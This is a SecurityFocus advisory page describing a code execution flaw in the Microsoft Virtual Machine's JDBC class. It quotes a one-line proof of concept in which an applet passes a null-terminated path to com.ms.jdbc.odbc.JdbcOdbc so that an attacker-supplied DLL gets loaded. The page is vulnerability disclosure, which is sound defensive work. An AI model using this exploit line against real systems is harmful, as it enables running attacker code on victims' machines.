Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft Virtual Machine JDBC Class Code Execution Vulnerability

The following proof of concept was provided by Jouko Pynnonen <jouko@solutions.fi>:

new com.ms.jdbc.odbc.JdbcOdbc("C:\\mydll\000");

This results in the malicious applet loading the attacker-supplied DLL 'C:\mydll.dll'.







 

Privacy Statement
Copyright 2008, SecurityFocus